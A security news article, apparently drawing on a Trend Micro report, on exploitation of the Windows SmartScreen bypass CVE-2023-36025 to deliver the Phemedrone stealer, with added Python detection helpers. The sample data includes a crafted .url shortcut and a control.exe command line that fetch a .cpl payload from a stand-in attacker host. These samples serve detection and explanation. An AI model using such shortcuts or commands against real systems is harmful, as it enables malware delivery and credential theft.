Opening the .url file connects to an attacker-controlled server to fetch and execute a Control Panel item (.cpl) file. Normally, Microsoft Defender SmartScreen would display a warning and security prompt before a .url file from an untrusted source is executed; the bug lets that prompt be skipped.
“The attackers craft a Windows shortcut (.url) file to evade the SmartScreen security prompt by using a .cpl file as part of a malicious payload delivery mechanism,” according to the post. “Threat actors leverage MITRE ATT&CK technique T1218.002, which abuses the Windows Control Panel process binary (control.exe) to execute .cpl files.”
The malicious .cpl file is then executed through the Windows Control Panel process binary to launch the final Phemedrone dropper, alongside several further steps that establish persistence. Once launched, Phemedrone initializes its configuration and decrypts sensitive data and credentials from targets on the infected system, including Chromium browsers, crypto wallets, Discord, FileGrabber, FileZilla, System Information, Steam, and Telegram.
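The two observable points in the chain above are the shortcut itself (a .url whose target is a .cpl hosted on a remote server) and the resulting process-creation event (control.exe, or rundll32.exe via Control_RunDLL, loading a .cpl from somewhere other than the Windows system directories). The following Python is an added example written for this article, not code from the Trend Micro report; the .url bodies and the Sysmon-style process records are constructed samples, and the path heuristics (trusted directories, user-writable markers) are assumptions a detection engineer would tune for their own environment.

```python
"""Detection helpers for the .url -> remote .cpl -> control.exe chain (T1218.002).

Added example for this article; it is not code from the Trend Micro report.
The .url bodies and process-creation records below are constructed samples.
"""
import re
from urllib.parse import urlparse

# Directories from which Windows legitimately loads Control Panel items (assumption).
TRUSTED_CPL_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# User-writable locations where an attacker-delivered .cpl would typically land (assumption).
SUSPECT_PATH_MARKERS = ("\\temp\\", "\\appdata\\", "\\downloads\\", "\\users\\public\\")
# First .cpl path on a command line: UNC (\\host\share\x.cpl) or drive-letter path.
CPL_ARG = re.compile(r'((?:\\\\|[a-z]:\\)[^"]*?\.cpl)', re.IGNORECASE)


def parse_url_file(text: str) -> dict:
    """Parse the INI-style body of a Windows Internet Shortcut (.url) file."""
    fields, section = {}, None
    for raw in text.splitlines():
        line = raw.lstrip("\ufeff").strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section == "internetshortcut" and "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip().lower()] = value.strip()
    return fields


def url_file_is_suspicious(text: str) -> bool:
    """True when the shortcut's target is a .cpl hosted on a remote server.

    A local file:///C:/... reference has an empty netloc; a file://host/share
    or https://host reference, or a bare UNC path, means the .cpl would be
    fetched over the network when the shortcut is opened.
    """
    target = parse_url_file(text).get("url", "")
    if target.startswith("\\\\"):                      # bare UNC path
        return target.lower().endswith(".cpl")
    parsed = urlparse(target)
    if not parsed.path.lower().endswith(".cpl"):
        return False
    if parsed.scheme in ("http", "https"):
        return True
    return parsed.scheme == "file" and bool(parsed.netloc)


def process_event_is_suspicious(event: dict) -> bool:
    """Flag control.exe (or rundll32 Control_RunDLL) loading a .cpl from an untrusted path."""
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "")
    is_control = image.endswith("\\control.exe")
    is_rundll_cpl = image.endswith("\\rundll32.exe") and "control_rundll" in cmd.lower()
    if not (is_control or is_rundll_cpl):
        return False
    match = CPL_ARG.search(cmd)
    if not match:
        return False
    cpl = match.group(1).lower()
    if cpl.startswith("\\\\"):                         # loaded over SMB/WebDAV
        return True
    if any(cpl.startswith(d) for d in TRUSTED_CPL_DIRS):
        return False
    return any(marker in cpl for marker in SUSPECT_PATH_MARKERS)


# Constructed Sysmon-style process-creation records (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\control.exe",
     "CommandLine": r'"C:\Windows\System32\control.exe" "\\attacker.example\share\payload.cpl"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\control.exe",
     "CommandLine": r'"C:\Windows\System32\control.exe" C:\Windows\System32\ncpa.cpl',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'rundll32.exe shell32.dll,Control_RunDLL C:\Users\bob\AppData\Local\Temp\update.cpl',
     "ParentImage": r"C:\Windows\System32\control.exe"},
]

# Constructed shortcut bodies: one pointing at a remotely hosted .cpl, one benign.
MALICIOUS_URL_FILE = "[InternetShortcut]\nURL=file://attacker.example/share/payload.cpl\n"
BENIGN_URL_FILE = "[InternetShortcut]\nURL=https://example.org/\n"


def scan_events(events) -> list:
    """Return the indices of events that match the untrusted-.cpl heuristic."""
    return [i for i, ev in enumerate(events) if process_event_is_suspicious(ev)]


if __name__ == "__main__":
    print(url_file_is_suspicious(MALICIOUS_URL_FILE), url_file_is_suspicious(BENIGN_URL_FILE))
    print(scan_events(SAMPLE_EVENTS))
```

The shortcut check is useful at the mail gateway or in a file-scanning pipeline, the process check in a SIEM or EDR rule. The legitimate-path allowlist is deliberately narrow: third-party software that installs its own .cpl under Program Files will not be flagged by the marker list, but will also not be whitelisted, so such paths should be reviewed and added to the trusted list per environment.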
Exploitation despite patch
Microsoft fixed CVE-2023-36025 as part of its November 2023 Patch Tuesday release and recommended that users update immediately, as the bug was already under active exploitation.
“Despite having been patched, threat actors continue to find ways to exploit CVE-2023-36025 and evade Windows Defender SmartScreen protections to infect users with a plethora of malware types,” Trend Micro said. “Public proof-of-concept exploit code exists on the web, increasing the risk to organizations that have not yet updated to the latest patched version.”
Trend Micro recommends immediately updating Windows installations to patched versions, and deploying effective XDR tools to consistently detect, scan, and block malicious content.